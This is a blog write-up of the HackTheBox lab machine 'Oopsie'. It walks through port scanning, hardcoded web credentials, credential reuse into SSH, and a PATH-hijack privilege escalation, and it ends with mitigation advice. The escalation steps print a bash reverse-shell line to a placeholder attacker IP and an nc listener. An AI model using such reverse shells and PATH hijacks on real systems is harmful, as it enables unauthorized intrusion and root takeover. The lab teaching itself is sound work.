EvolevBoard

Contact us

HackTheBox: Oopsie Writeup

admin Avatar
admin

Overview

Oopsie is a Linux-based HackTheBox machine that involves web application authentication bypass, database credential extraction, and privilege escalation through PATH manipulation. This writeup covers the complete exploitation process.

Reconnaissance

Port Scanning

We begin with a comprehensive port scan:

nmap -sV -sC -p- <HTB_IP>

Open Ports:

  • 22/tcp – OpenSSH 7.6p1 Ubuntu
  • 80/tcp – Apache httpd 2.4.29 (Ubuntu)

The target is running a standard LAMP stack on Ubuntu Linux.

Web Application Enumeration

Browsing to http://<HTB_IP> reveals a web application. Initial enumeration shows it’s a custom application that requires authentication.

Initial Access

Authentication Bypass

Through source code analysis or directory enumeration, we discover authentication logic. The PHP code reveals hardcoded credentials:

if($_POST["username"]==="admin" && $_POST["password"]==="MEGACORP_4dm1n!!")

Credentials:

  • Username: admin
  • Password: MEGACORP_4dm1n!!

We can use these credentials to log into the web application.

Database Credential Discovery

After authenticating, we explore the application’s functionality. Through source code analysis or application behavior, we discover database connection credentials:

$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');

Database Credentials:

  • Host: localhost
  • Username: robert
  • Password: M3g4C0rpUs3r!
  • Database: garage

SSH Access

With the database credentials, we can attempt to access the system via SSH. The username robert and password M3g4C0rpUs3r! allow us to establish an SSH connection:

ssh robert@<HTB_IP>

We now have user-level access to the system.

Privilege Escalation

Enumeration

After gaining initial access, we perform standard enumeration to identify privilege escalation vectors. We check for SUID binaries, writable files, cron jobs, and other common misconfigurations.

PATH Manipulation

During enumeration, we discover that we can manipulate the PATH environment variable. The current PATH is:

/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games

Notice that /tmp is at the beginning of the PATH, which means executables in /tmp will be executed before system binaries if they share the same name.

Exploiting PATH

We can exploit this by:

  1. Creating a malicious binary in /tmp with a name that matches a binary executed by root (or another privileged user) via a cron job or SUID binary.
  2. Setting the PATH to prioritize /tmp:export PATH=/tmp:$PATH
  3. Creating the malicious binary (e.g., if a cron job runs a binary without absolute path):echo '#!/bin/bash' > /tmp/binary_name echo 'bash -i >& /dev/tcp/<Attacker_ip>/4444 0>&1' >> /tmp/binary_name chmod +x /tmp/binary_name
  4. Setting up a listener:nc -lvnp 4444
  5. Waiting for execution or triggering the execution if possible.

Alternatively, if we find a SUID binary or a cron job that executes a binary without an absolute path, we can create a malicious version in /tmp that will be executed instead.

Root Access

Once the malicious binary is executed with root privileges, we receive a root shell. We can then retrieve both user and root flags:

cat /home/robert/user.txt
cat /root/root.txt

Key Takeaways

  1. Hardcoded Credentials: Hardcoded credentials in source code are a critical security vulnerability. Always use secure credential storage mechanisms.
  2. Credential Reuse: Database credentials discovered in one context may be reused for system access if password reuse is present.
  3. PATH Manipulation: Having user-controlled directories (like /tmp) at the beginning of the PATH can lead to privilege escalation if privileged processes execute binaries without absolute paths.
  4. Source Code Analysis: Analyzing application source code can reveal authentication mechanisms, database credentials, and other sensitive information.

Mitigation Recommendations

  • Never hardcode credentials in source code; use environment variables or secure credential stores
  • Implement proper password policies and avoid credential reuse across services
  • Ensure PATH environment variables are properly configured and don’t include user-writable directories
  • Use absolute paths when executing binaries in scripts, cron jobs, and SUID binaries
  • Regularly audit and review cron jobs and scheduled tasks
  • Implement proper file permissions and restrict write access to system directories
  • Use tools like sudo with restricted command execution instead of SUID binaries where possible

Leave a Reply

Your email address will not be published. Required fields are marked *